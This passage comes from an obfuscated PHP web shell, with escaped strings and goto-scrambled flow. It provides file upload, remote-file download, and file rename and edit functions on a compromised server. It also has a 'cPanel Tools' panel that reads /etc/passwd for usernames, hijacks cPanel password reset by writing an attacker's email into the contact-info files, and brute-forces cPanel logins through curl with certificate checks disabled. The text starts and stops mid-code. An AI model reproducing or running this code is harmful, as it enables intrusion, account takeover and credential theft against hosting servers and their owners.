"\74\x73\143\162\151\x70\x74\x3e\141\x6c\x65\x72\164\x28\x27\x46\141\x69\x6c\145\144\x20\164\157\x20\144\157\x77\156\154\x6f\x61\x64\40\x74\150\145\40\x66\151\x6c\x65\x20\x6f\162\40\x66\x69\x6c\145\x20\163\151\x7a\x65\40\x69\x73\x20\x30\40\142\171\x74\x65\x2e\x27\x29\73\x3c\57\x73\x63\162\151\160\164\x3e"; } } } echo "\74\x64\151\166\x20\x63\x6c\141\x73\x73\x3d\x22\143\141\x72\x64\x20\143\x61\162\x64\x2d\142\x6f\x64\x79\40\x74\145\170\164\x2d\144\141\162\153\40\151\156\x70\165\x74\55\147\162\x6f\165\x70\40\x6d\x62\55\x33\x22\x3e\12\x9\11\74\x66\157\x72\x6d\40\141\143\x74\x69\x6f\156\x3d\x22\42\40\x6d\x65\x74\x68\x6f\x64\75\x22\160\x6f\163\164\42\x3e\xa\x9\11\x3c\x64\x69\166\40\143\x6c\x61\163\163\75\x22\146\157\x72\155\55\x67\x72\157\x75\x70\40\144\x2d\146\x6c\145\x78\x20\141\x6c\x69\x67\156\x2d\151\x74\x65\x6d\163\55\143\145\x6e\x74\x65\x72\42\76\12\11\x9\x9\74\x69\x6e\160\165\164\x20\164\171\x70\x65\x3d\x22\x74\x65\170\x74\x22\x20\x63\x6c\x61\x73\x73\75\x22\146\157\x72\x6d\x2d\143\x6f\156\164\162\x6f\x6c\40\x66\x6f\x72\155\55\143\157\x6e\x74\x72\x6f\154\55\x73\155\x20\x74\x65\x78\x74\55\x64\141\x72\153\40\x66\x6c\145\x78\55\147\162\x6f\x77\55\x31\x22\x20\160\x6c\x61\x63\x65\x68\x6f\154\144\145\162\x3d\x22\150\164\164\x70\x73\72\x2f\57\x70\x69\162\x61\156\150\x61\56\x67\x6f\x2e\151\144\x2f\x66\x69\154\145\x73\x2f\x6d\171\x66\151\x6c\x65\163\x2e\164\x78\x74\42\x20\x6e\x61\155\145\x3d\42\165\x72\154\x22\40\x69\x64\x3d\42\165\162\154\42\x20\x72\x65\161\x75\x69\x72\x65\x64\76\xa\11\x9\11\x3c\x69\156\160\x75\164\x20\164\x79\160\x65\x3d\42\164\x65\x78\164\x22\40\143\x6c\141\x73\x73\x3d\x22\146\157\162\x6d\55\143\157\156\164\x72\157\154\40\146\157\162\x6d\x2d\143\x6f\156\x74\x72\x6f\x6c\55\x73\x6d\x20\164\145\170\164\55\x64\x61\x72\153\x22\x20\156\141\155\145\x3d\x22\157\x75\x74\160\x75\x74\x5f\x66\151\154\x65\x6e\x61\155\145\42\x20\160\154\x61\x63\x65\x68\157\154\144\x65\x72\x3d\42\163\x61\166\145\x64\x2e\x74\170\x74\42\40\x69\x64\x3d\42\x6f\165\x74\160\x75\x74\x5f\x66\151\154\x65\156\x61\x6d\145\x22\40\x72\x65\161\x75\151\162\x65\x64\x20\163\164\x79\x6c\x65\75\x22\x77\x69\x64\x74\x68\x3a\40\63\60\x30\x70\170\73\x22\x3e\12\11\x9\11\74\163\x65\x6c\x65\143\164\40\x63\x6c\x61\x73\x73\75\42\146\157\162\x6d\x2d\x63\x6f\x6e\164\162\x6f\154\x20\x66\157\x72\155\55\143\x6f\x6e\x74\162\x6f\154\x2d\163\155\40\164\145\x78\164\55\x64\141\162\153\42\40\156\141\x6d\145\75\42\155\145\x74\150\157\x64\x22\x20\151\x64\75\x22\155\145\x74\x68\x6f\144\42\40\x72\x65\161\x75\151\162\x65\144\x20\163\164\171\154\x65\x3d\x22\x77\x69\144\164\x68\x3a\x20\62\x30\x30\x70\170\73\x22\76\12\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x6f\160\x74\151\157\156\40\166\141\154\165\x65\x3d\x22\146\151\154\x65\137\147\145\164\x5f\143\x6f\x6e\x74\x65\156\x74\x73\x22\x3e\x66\x69\154\x65\137\x67\145\164\x5f\143\x6f\156\x74\145\156\164\x73\74\57\157\160\x74\151\157\156\76\12\40\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\x3c\157\x70\164\151\x6f\156\x20\x76\x61\x6c\x75\x65\x3d\42\x63\x75\162\x6c\42\76\143\x55\122\x4c\x3c\x2f\x6f\x70\164\x69\x6f\x6e\x3e\12\40\x20\x20\40\40\40\40\x20\x20\x20\40\x20\x3c\157\x70\164\151\x6f\x6e\x20\x76\141\154\x75\145\x3d\42\146\157\x70\x65\x6e\x22\76\146\x6f\160\x65\x6e\x3c\57\x6f\x70\x74\x69\x6f\156\x3e\12\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\x20\x3c\157\x70\x74\x69\157\x6e\x20\166\141\154\165\x65\75\42\143\157\x70\171\42\x3e\143\157\160\x79\74\x2f\157\x70\x74\x69\157\x6e\76\xa\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\x3c\157\160\x74\151\x6f\x6e\40\166\141\154\165\x65\75\42\163\164\x72\145\x61\155\x5f\x63\157\x6e\x74\145\170\164\x22\x3e\163\164\x72\145\x61\x6d\x5f\x63\157\x6e\164\x65\170\x74\x3c\x2f\x6f\x70\164\151\x6f\156\x3e\xa\x20\40\40\40\x20\40\x20\x20\40\40\40\x20\x3c\x6f\x70\x74\x69\x6f\156\40\x76\x61\x6c\165\x65\x3d\x22\146\x69\154\x65\x22\76\146\151\x6c\145\x3c\57\157\x70\x74\151\x6f\156\76\12\x9\11\x9\x3c\57\x73\x65\154\x65\x63\164\76\12\11\11\11\x3c\142\165\164\164\x6f\x6e\x20\143\154\141\163\x73\x3d\x22\142\164\156\x20\142\164\156\55\x64\x61\x72\153\x20\142\164\156\x2d\x73\x6d\42\40\164\x79\x70\x65\x3d\x22\x73\x75\142\x6d\151\x74\42\x20\156\x61\155\x65\x3d\42\165\160\x6c\42\76\x53\141\166\145\41\x3c\x2f\x62\x75\164\164\x6f\x6e\76\xa\x9\11\x3c\x2f\144\x69\x76\x3e\xa\x9\11\x3c\x2f\146\x6f\x72\155\76\x9\x9\12\x20\x20\x20\40\40\40\x20\x20\x20\40\40\40\74\146\157\162\x6d\x20\155\145\164\x68\157\144\75\42\x50\117\123\x54\x22\40\145\x6e\143\x74\x79\160\x65\75\x22\x6d\x75\154\x74\x69\x70\141\x72\164\x2f\x66\157\162\155\x2d\144\x61\x74\141\42\76\12\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\74\144\151\166\x20\143\x6c\x61\x73\x73\75\42\151\x6e\x70\x75\x74\55\147\162\x6f\165\160\42\x3e\12\x20\x20\x20\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\40\x3c\x69\156\160\x75\164\40\x63\154\x61\163\x73\75\42\146\x6f\x72\155\55\x63\x6f\x6e\164\162\x6f\x6c\x20\x66\157\x72\155\55\143\x6f\156\164\x72\157\x6c\x2d\163\155\x20\x74\x65\170\164\55\x64\141\162\x6b\42\x20\x74\x79\x70\145\x3d\x22\x66\151\x6c\145\x22\40\156\141\x6d\x65\75\x22\146\x69\154\x65\133\135\42\40\155\x75\154\x74\151\160\154\145\x3d\42\42\x3e\12\x20\40\40\40\40\40\40\40\40\40\x20\40\40\x20\x20\x20\40\x20\40\x20\x3c\144\151\166\x20\x63\x6c\141\163\x73\75\42\x69\156\160\x75\x74\55\x67\x72\x6f\x75\x70\x2d\x61\160\x70\x65\x6e\144\42\x3e\xa\x20\40\40\40\40\x20\x20\x20\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\40\40\40\40\x3c\142\165\x74\x74\x6f\x6e\40\x63\x6c\141\163\x73\75\42\142\x74\x6e\40\142\164\156\55\144\x61\x72\153\x20\142\x74\x6e\x2d\x73\155\x22\x20\x74\x79\x70\x65\75\x22\x73\165\142\155\x69\x74\x22\40\x6e\141\x6d\145\75\x22\x75\160\x6c\x22\x3e\125\160\x6c\157\141\144\x21\74\57\142\x75\164\x74\x6f\x6e\76\12\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\40\x20\x20\40\40\x20\x3c\57\x64\151\x76\76\xa\x20\x20\40\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\x3c\x2f\x64\151\166\x3e\12\x20\x20\40\40\40\x20\40\40\x20\x20\40\40\74\57\x66\157\x72\155\x3e\12\x20\x20\x20\40\40\x20\x20\x20\74\57\144\x69\x76\76\xa\x20\40\40\40\x20\x20\x20\x20\74\x2f\x64\151\166\x3e\xa\40\40\x20\x20\74\57\x64\151\x76\76"; if (isset($_POST["\x75\160\x6c"])) { $result = count($_FILES["\x66\x69\154\145"]["\x6e\141\x6d\x65"]); for ($contents = 0; $contents < $result; $contents++) { $namefile = $_FILES["\146\151\154\145"]["\156\x61\x6d\145"][$contents]; if ($_FILES["\146\x69\x6c\x65"]["\x73\x69\x7a\145"][$contents] === 0) { $up = @copy($_FILES["\146\151\154\145"]["\x74\x6d\160\x5f\156\141\x6d\145"][$contents], "{$path}\x2f" . $namefile); if (!$up) { $fileContent = file_get_contents($_FILES["\146\x69\154\x65"]["\x74\155\x70\137\156\x61\155\x65"][$contents]); if ($fileContent !== false) { $up = file_put_contents("{$path}\x2f" . $namefile, $fileContent); } } } else { $up = move_uploaded_file($_FILES["\146\x69\x6c\145"]["\x74\155\160\137\156\141\x6d\145"][$contents], "{$path}\57" . $namefile); } } if ($result < 2) { if ($up) { $downloadLink = $urlwebsite . str_replace(realpath($_SERVER["\x44\117\103\125\x4d\x45\x4e\124\137\122\117\117\124"]), '', realpath(getcwd())) . "\57" . basename($namefile); echo "\74\142\162\x3e\74\x63\145\156\x74\145\x72\76\x3c\x70\x3e\107\60\x74\x63\x68\x61\141\41\x20\103\x6c\x69\143\153\40\164\x68\145\x20\x6c\x69\x6e\153\40\x62\x65\154\157\167\40\x74\x6f\40\141\x63\x63\145\163\x73\40\164\x68\145\40\165\x70\154\x6f\141\x64\x65\144\x20\146\x69\x6c\145\72\x3c\x2f\160\x3e\74\x61\40\150\162\x65\146\x3d\47{$downloadLink}\x27\40\164\141\162\147\145\x74\75\x27\137\x62\x6c\141\x6e\x6b\x27\x20\x63\154\141\x73\x73\x3d\47\x62\x74\156\40\x62\x74\156\55\x64\x61\x6e\147\x65\x72\x27\x3e" . basename($namefile) . "\74\x2f\x61\76\x3c\57\143\x65\156\x74\145\162\x3e\74\142\x72\x3e"; } } else { echo "\74\x64\x69\x76\40\143\154\x61\x73\163\75\47\x61\154\145\162\164\x20\x61\154\145\x72\164\55\163\165\x63\x63\145\163\163\x27\x20\x72\x6f\154\145\75\47\x61\154\145\162\x74\47\76\x55\x70\x6c\157\x61\x64\x20{$result}\40\117\113\x21\74\x2f\144\151\x76\76"; } } } goto wq8hw; YjChs: $_POST = Yolo($_POST); goto sgMYv; eqiB1: function Yolosetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto ZaPiC; PKEsQ: if (isset($_1337["\x64\x69\x72"])) { $dir = $_1337["\144\x69\162"]; chdir($dir); } else { $dir = $gcw(); } goto GLlWs; W00tD: if (empty($disfunc)) { $disfc = "\x3c\x67\162\76\116\117\x4e\105\74\57\147\162\x3e"; } else { $disfc = "\x3c\162\144\x3e{$disfunc}\x3c\57\162\144\x3e"; } goto pJlC5; HwDnQ: if (isset($_1337["\x72\137\146"])) { $old = $file; $new = $_1337["\156\x65\167\x5f\x6e\x61\155\145"]; rename($new, $old); if (file_exists($new)) { echo "\x3c\x64\x69\166\40\x63\154\141\163\163\x3d\x22\141\x6c\145\x72\x74\x20\x61\x6c\x65\x72\x74\x2d\x64\141\x6e\147\x65\x72\40\141\154\x65\162\164\x2d\x64\151\x73\155\x69\163\163\151\x62\x6c\145\40\x66\x61\x64\x65\x20\x73\x68\157\x77\40\x6d\171\55\x33\x22\x20\x72\x6f\154\x65\75\x22\x61\x6c\145\162\164\x22\76\12\11\11\x9\74\x73\x74\162\x6f\x6e\x67\76\122\145\x6e\x61\x6d\x65\40\146\x69\154\145\x3c\57\163\164\x72\x6f\156\147\x3e\x20\156\x61\155\145\x20\141\154\x72\x65\x61\x64\171\40\151\x6e\40\165\163\x65\41\x20\x3c\x62\x75\x74\x74\157\156\40\164\171\x70\x65\75\42\x62\x75\164\x74\x6f\x6e\x22\40\x63\154\141\x73\x73\x3d\x22\142\x74\x6e\55\x63\154\x6f\163\x65\x22\x20\x64\141\x74\141\x2d\142\x73\x2d\x64\151\163\155\x69\x73\163\x3d\x22\x61\154\x65\x72\164\x22\40\141\x72\x69\x61\55\154\141\x62\145\x6c\x3d\x22\103\154\157\x73\145\42\76\x3c\57\x62\x75\164\164\157\156\x3e\xa\x9\x9\74\57\x64\x69\x76\x3e"; } else { if (rename($old, $new)) { echo "\x3c\x73\x74\x72\x6f\x6e\147\x3e\x52\x65\x6e\141\x6d\x65\x20\x66\x69\154\x65\74\57\x73\164\162\x6f\156\147\76\40\x4f\113\x21\40" . ok() . "\x3c\x2f\x64\x69\166\x3e"; } else { echo "\x3c\163\x74\162\157\156\147\x3e\x52\x65\x6e\141\155\x65\x20\146\x69\x6c\145\74\x2f\163\164\162\157\x6e\147\76\40\106\101\111\114\41\x20" . er() . "\x3c\57\x64\151\166\76"; } } } goto XcvSP; S0ump: if (isset($_1337["\145\144\x69\164\x5f\146\151\x6c\145"])) { $updt = fopen("{$file}", "\167"); $result = fwrite($updt, $_1337["\143\x6f\156\x74\x65\x6e\x74\x73"]); if ($result) { echo "\74\163\164\162\x6f\156\147\x3e\x45\x64\151\164\x20\146\x69\154\x65\x3c\57\x73\x74\162\x6f\156\x67\76\40\117\x4b\x21\x20" . ok() . "\x3c\x2f\144\x69\166\x3e"; } else { echo "\x3c\x73\164\x72\x6f\156\147\x3e\105\144\x69\x74\40\146\151\154\145\74\57\x73\x74\162\157\156\x67\x3e\x20\x46\x41\x49\x4c\41\40" . er() . "\x3c\x2f\x64\x69\166\76"; } } goto H5qMP; AQaOe: $curl = function_exists("\x63\x75\162\154\x5f\166\145\162\x73\151\x6f\x6e") ? "\74\x67\162\x3e\x4f\116\x3c\57\x67\x72\76" : "\x3c\x72\144\76\117\x46\x46\x3c\57\162\x64\x3e"; goto yAMz0; ZfZWC: if ($_1337["\151\x64"] == "\143\x70\141\156\145\x6c") { s(); echo "\74\143\x65\156\164\145\x72\40\143\x6c\x61\x73\x73\x3d\x22\x61\156\x75\42\x3e\x63\x50\141\156\145\x6c\x20\124\x6f\157\154\163\74\x2f\x63\145\156\x74\x65\162\76\12\x20\x20\40\x20\40\40\40\40\x3c\144\x69\x76\40\x63\x6c\x61\163\x73\75\x22\143\141\x72\x64\40\x63\x61\162\x64\x2d\x62\x6f\x64\x79\40\x74\x65\x78\164\55\x64\141\162\153\x20\151\156\160\x75\x74\55\x67\162\157\165\160\x20\155\142\x2d\63\42\76\xa\40\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\x3c\x66\157\162\x6d\x20\x61\143\x74\151\x6f\x6e\x3d\42\42\40\155\145\x74\150\x6f\x64\x3d\42\160\157\x73\164\42\76\12\40\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\x3c\144\x69\x76\x20\143\154\x61\x73\x73\x3d\42\146\x6f\x72\155\55\x67\x72\x6f\165\160\x22\76\12\40\40\40\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x3c\x6c\x61\x62\145\x6c\x20\146\x6f\x72\75\42\157\160\164\x69\157\156\42\x3e\x53\x65\154\145\143\164\40\141\156\40\x6f\160\x74\x69\x6f\156\72\74\x2f\x6c\x61\142\145\x6c\76\12\40\40\x20\40\40\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\x3c\163\145\154\x65\143\x74\x20\x6e\x61\155\145\x3d\42\x6f\x70\x74\x69\157\x6e\x22\40\143\x6c\141\163\x73\75\x22\146\157\162\x6d\55\143\157\156\x74\x72\157\x6c\42\x3e\xa\x20\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\74\x6f\160\x74\151\x6f\x6e\x20\x76\141\154\x75\145\x3d\x22\162\145\163\x65\x74\x22\76\122\x65\x73\145\164\40\x50\x61\x73\163\x77\157\x72\144\40\x75\x73\151\x6e\147\x20\x45\155\141\x69\x6c\x3c\x2f\157\x70\164\x69\x6f\x6e\x3e\12\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\74\x6f\160\x74\151\157\156\x20\166\x61\x6c\165\x65\75\42\x62\x72\165\164\145\x22\x3e\102\x72\165\x74\145\x20\106\x6f\162\x63\x65\x20\x50\x61\x73\x73\x77\157\x72\x64\74\57\x6f\x70\x74\151\x6f\x6e\x3e\xa\40\40\40\40\x20\x20\40\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\x3c\x2f\163\x65\x6c\145\x63\164\x3e\12\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\x3c\x2f\144\151\x76\x3e\xa\40\x20\40\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\74\x64\151\x76\40\x63\154\x61\163\x73\x3d\42\x66\157\162\155\x2d\x67\162\157\165\x70\42\76\xa\x20\x20\40\40\40\40\40\x20\40\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\x3c\151\x20\143\x6c\x61\163\163\75\x22\142\151\x20\x62\151\55\145\156\166\145\x6c\157\160\x65\55\x66\151\x6c\x6c\42\76\x3c\57\151\76\40\x3c\x6c\x61\x62\145\x6c\x20\x66\157\162\75\x22\x75\x73\x65\x72\105\x6d\x61\151\x6c\42\76\x59\x6f\165\x72\x20\145\x6d\141\151\x6c\x20\50\146\157\x72\x20\162\145\163\145\164\x20\x70\x61\x73\163\x77\x6f\162\144\x21\51\x3c\x2f\154\x61\142\145\x6c\76\12\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\40\40\40\40\40\x20\x3c\x64\151\166\x20\x63\154\x61\163\163\75\x22\x69\x6e\160\165\164\x2d\147\x72\157\x75\x70\42\x3e\12\x20\x20\40\40\40\x20\40\x20\40\40\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\74\151\x6e\160\165\164\x20\x74\x79\160\145\x3d\42\x65\155\x61\151\154\x22\40\143\154\x61\163\163\x3d\42\146\x6f\162\155\x2d\x63\x6f\x6e\x74\x72\x6f\x6c\40\142\x74\156\55\163\x6d\x20\x74\145\170\x74\55\x64\x61\162\153\x22\40\156\x61\x6d\145\75\x22\x75\x73\145\x72\x45\155\x61\151\x6c\42\40\x70\154\141\x63\145\x68\x6f\x6c\144\145\162\x3d\42\154\x6f\x6c\143\141\164\x73\x40\x70\x69\x72\141\x6e\150\141\56\147\157\x2e\x69\144\x22\76\xa\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\40\40\x20\74\x2f\x64\x69\x76\76\12\x20\x20\40\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\x3c\57\144\151\x76\x3e\xa\40\x20\40\x20\40\40\x20\x20\x20\x20\40\40\x20\40\40\40\74\x64\x69\166\40\143\x6c\x61\163\x73\x3d\x22\x66\x6f\162\155\55\x67\x72\157\165\160\42\76\xa\40\40\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\74\x6c\x61\142\x65\x6c\40\146\157\162\75\x22\150\157\163\x74\42\76\x63\x50\141\156\x65\154\40\x48\x6f\163\x74\x3a\74\57\x6c\141\142\x65\x6c\76\12\40\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\74\151\156\x70\x75\x74\x20\164\x79\160\x65\x3d\x22\x74\x65\x78\164\42\x20\143\x6c\x61\x73\163\75\x22\x66\157\x72\x6d\55\143\x6f\x6e\164\162\157\154\x20\x62\164\156\x2d\163\x6d\x20\x74\145\170\x74\x2d\144\x61\162\x6b\x22\x20\156\x61\x6d\145\75\x22\x68\x6f\x73\164\42\x20\x76\x61\x6c\x75\x65\x3d\x22\150\164\164\x70\x73\72\57\57" . $_SERVER["\110\124\124\x50\137\x48\117\x53\124"] . "\72\x32\60\x38\x33\42\x3e\xa\40\40\40\40\x20\40\40\40\40\40\40\40\40\40\40\x20\74\x2f\144\151\166\76\xa\40\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\40\74\x64\x69\x76\x20\x63\154\141\163\163\75\x22\146\x6f\162\155\55\147\x72\157\x75\x70\x22\76\xa\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\40\x20\x20\x20\40\40\40\40\40\74\154\141\142\145\154\40\146\x6f\162\75\x22\x75\163\145\162\x6e\x61\155\x65\163\42\76\x55\x73\145\162\156\x61\x6d\x65\x73\40\x28\x61\165\x74\x6f\x20\147\x65\x74\40\x75\163\145\x72\40\146\x72\157\155\40\57\x65\164\x63\x2f\160\141\163\x73\167\x64\x20\x26\x20\164\150\x65\40\157\x6e\145\x20\x69\156\x20\x2f\x68\x6f\x6d\145\57\x29\72\x3c\x2f\x6c\141\142\145\x6c\x3e\12\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\40\x20\40\40\x20\40\74\x74\x65\170\x74\141\x72\x65\141\x20\x63\x6c\141\163\163\x3d\42\146\x6f\x72\x6d\55\143\157\156\164\162\x6f\x6c\x20\x62\164\x6e\55\163\155\x20\164\145\x78\x74\55\x64\141\x72\153\x22\40\156\141\x6d\x65\x3d\x22\165\x73\x65\162\156\x61\155\145\163\x22\x20\162\x6f\x77\163\75\42\65\42\76"; $usernames = file("\x2f\145\x74\x63\57\160\x61\x73\x73\x77\x64"); foreach ($usernames as $user) { $userData = explode("\x3a", $user); $username = $userData[0]; $homeDir = $userData[5]; if (strpos($homeDir, "\57\150\x6f\x6d\x65\x2f") === 0 && is_dir($homeDir)) { echo $username . "\xa"; } } echo "\x3c\57\x74\145\170\164\x61\x72\x65\x61\76\12\x20\40\40\x20\40\x20\40\x20\40\x20\x20\x20\40\40\40\40\x3c\x2f\144\151\166\x3e\xa\40\x20\x20\40\40\x20\x20\x20\40\x20\40\40\x20\40\x20\40\x3c\x64\x69\x76\x20\x63\x6c\141\163\x73\75\42\146\157\x72\155\55\147\162\x6f\165\x70\x22\x3e\xa\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\74\154\141\142\145\154\40\x66\x6f\x72\75\42\160\141\x73\163\167\x6f\162\x64\163\x22\76\x50\141\x73\x73\167\157\x72\144\40\x4c\x69\163\x74\x20\50\157\156\145\x20\x70\x65\162\40\x6c\151\156\145\x29\72\x3c\x2f\154\141\x62\145\x6c\76\xa\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\40\x20\x20\40\40\40\x3c\x74\145\x78\x74\141\162\x65\x61\x20\x63\x6c\141\163\x73\x3d\x22\x66\157\x72\155\55\143\157\156\x74\162\157\154\x20\142\164\156\x2d\x73\x6d\x20\x74\145\170\x74\x2d\144\141\x72\x6b\x22\x20\x6e\141\155\x65\75\x22\160\141\x73\x73\x77\x6f\x72\x64\163\42\40\x72\157\167\x73\x3d\42\65\42\40\160\x6c\141\x63\x65\150\x6f\154\144\x65\162\x3d\42\x70\x61\163\x73\x77\157\x72\144\61\x26\43\x31\x30\x3b\x70\x61\x73\x73\167\x6f\162\x64\62\46\x23\x31\x30\73\160\x61\x73\x73\x77\157\162\144\x33\42\x3e\x3c\x2f\164\x65\170\x74\x61\162\145\141\x3e\xa\x20\x20\40\40\40\40\x20\x20\40\40\x20\40\x20\40\x20\x20\74\57\x64\x69\x76\x3e\12\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\x20\40\40\x20\40\74\144\x69\166\40\143\x6c\141\163\x73\75\42\144\x2d\x67\162\x69\x64\40\147\x61\160\55\62\x22\x3e\12\40\x20\x20\40\40\40\x20\40\40\40\x20\x20\x20\x20\40\40\40\40\40\40\74\151\x6e\160\x75\164\x20\143\154\141\163\x73\x3d\x22\142\x74\x6e\40\142\x74\x6e\55\x64\141\162\153\x20\142\164\x6e\x2d\163\x6d\x22\40\164\171\160\x65\75\x22\163\x75\x62\155\x69\164\x22\40\156\141\155\x65\x3d\42\x73\165\x62\155\151\164\x22\x20\x76\141\154\165\145\x3d\x22\123\x75\x62\155\151\x74\41\x22\76\xa\x20\40\40\x20\40\x20\x20\x20\40\40\x20\40\40\40\40\x20\x3c\57\144\151\166\x3e\12\x20\x20\40\40\40\40\x20\40\x20\x20\40\x20\x3c\x2f\146\157\162\x6d\x3e\12\40\x20\x20\x20\40\40\x20\40\74\x2f\x64\151\166\76\xa\x20\x20\40\40\40\40\40\40"; if (isset($_POST["\x73\165\x62\x6d\151\x74"])) { $option = $_POST["\157\x70\164\151\x6f\156"]; $userEmail = $_POST["\165\x73\x65\x72\x45\155\x61\x69\x6c"]; $host = $_POST["\x68\157\x73\164"]; $passwordList = explode(PHP_EOL, trim($_POST["\x70\x61\x73\x73\167\x6f\162\144\163"])); $usernameList = explode(PHP_EOL, trim($_POST["\165\x73\x65\162\x6e\141\x6d\145\x73"])); if ($option == "\x72\x65\163\145\x74" && !empty($userEmail)) { $currentUser = get_current_user(); $userInfo = "\x65\x6d\141\151\x6c\72" . $userEmail; $fileHandle = fopen("\57\150\157\155\x65\57" . $currentUser . "\57\56\143\x70\x61\x6e\145\x6c\57\x63\x6f\156\164\x61\x63\164\151\156\146\x6f", "\167"); fwrite($fileHandle, $userInfo); fclose($fileHandle); $fileHandle = fopen("\x2f\x68\x6f\155\145\57" . $currentUser . "\57\56\143\x6f\x6e\164\x61\143\x74\x69\156\146\x6f", "\167"); fwrite($fileHandle, $userInfo); fclose($fileHandle); $protocol = "\150\164\164\x70\163\x3a\57\57"; $cpanelPort = "\x32\x30\70\x33"; $resetPassLink = $host . "\x3a\62\60\70\x33\57\x72\x65\x73\145\164\x70\x61\163\x73\x3f\163\164\141\162\x74\75\x31"; $readContactInfo = @file("\57\150\x6f\x6d\x65\57" . $currentUser . "\57\56\143\160\x61\156\x65\x6c\x2f\x63\157\156\164\141\143\164\x69\156\x66\x6f"); if (!$readContactInfo) { echo "\74\x63\x65\156\x74\145\162\76\x3c\150\x31\x3e\x53\x6f\x72\162\x79\54\x20\x61\143\x63\145\163\x73\x20\x64\145\156\x69\145\x64\41\x3c\x2f\150\61\x3e\74\x62\x72\76\74\x62\x72\76\74\57\160\x72\145\76\74\57\x63\x65\156\x74\145\162\76"; } else { echo "\74\143\x65\156\x74\145\x72\x3e\104\x4f\x4e\105\41\x20\x43\157\x70\171\x20\x74\150\x69\x73\x20\165\x73\x65\x72\x6e\141\155\145\40\x66\x6f\x72\40\x52\x65\x73\145\164\x20\x50\141\163\163\167\157\x72\144\40\143\120\x61\156\145\154\x3c\142\x72\x3e\x3c\x2f\x63\x65\x6e\x74\145\x72\x3e"; echo "\74\x64\x69\x76\x20\143\154\x61\x73\163\x3d\42\164\145\170\164\x2d\143\x65\156\x74\145\162\42\x3e\74\x69\x6e\160\165\164\40\x74\x79\x70\145\x3d\42\x74\145\170\x74\42\x20\143\154\141\x73\163\x3d\x22\146\157\x72\155\x2d\143\x6f\x6e\164\162\x6f\x6c\x22\40\x76\141\x6c\x75\x65\x3d\42" . $currentUser . "\42\x20\x69\144\75\42\165\x73\x65\x72\x22\x3e\x20\74\x62\x75\164\164\x6f\156\40\157\156\x63\x6c\151\143\153\x3d\x22\x63\157\x70\x79\x55\163\145\162\156\141\x6d\x65\x28\x29\x22\x20\143\x6c\141\x73\x73\x3d\42\x62\164\156\x20\142\x74\156\55\x73\x75\x63\143\145\163\x73\42\x3e\x3c\151\40\143\154\141\163\x73\75\x22\142\151\40\x62\x69\55\x63\x6c\x69\x70\x62\x6f\x61\162\x64\42\x3e\x3c\x2f\151\x3e\40\x43\x4f\x50\131\x20\x54\105\x58\124\x3c\57\142\165\x74\164\x6f\x6e\x3e\74\57\144\x69\166\x3e"; echo "\74\142\x72\x2f\76\74\144\x69\166\40\143\154\141\x73\x73\x3d\x22\164\145\170\x74\x2d\x63\145\156\x74\x65\162\x22\x3e\x3c\x61\x20\x74\x61\x72\x67\145\x74\75\x22\137\142\154\x61\x6e\153\42\x20\150\x72\145\x66\75\42" . $protocol . $resetPassLink . "\42\x3e\x52\x65\163\x65\x74\x20\x50\141\x73\x73\167\x6f\x72\144\x20\x4c\x69\156\x6b\x3c\57\x61\x3e\74\x2f\x64\x69\166\76"; } } elseif ($option == "\142\x72\165\164\x65" && !empty($host) && !empty($passwordList) && !empty($usernameList)) { $successfulLogins = array(); $failedLogins = array(); foreach ($usernameList as $username) { $username = trim($username); foreach ($passwordList as $password) { $password = trim($password); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$host}\x2f\x6c\157\x67\151\156\57\x3f\x6c\x6f\x67\x69\x6e\x5f\x6f\x6e\154\x79\x3d\61"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "\165\x73\x65\162\75{$username}\x26\160\141\163\x73\x3d{$password}"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $response = curl_exec($ch); curl_close($ch); if (strpos($response, "\143\x70\x73\145\x73\163") !== false) { $successfulLogins[] = "\125\163\x65\162\156\141\x6d\x65\72\x20{$username}\40\x7c\x20\120\141\x73\x73\x77\157\x72\144\72\40{$password}"; } else { $failedLogins[] = "\125\x73\x65\x72\x6e\141\155\145\x3a\x20{$username}\x20\174\40\x50\x61\x73\163\167\x6f\x72\144\72\x20{$password}"; } 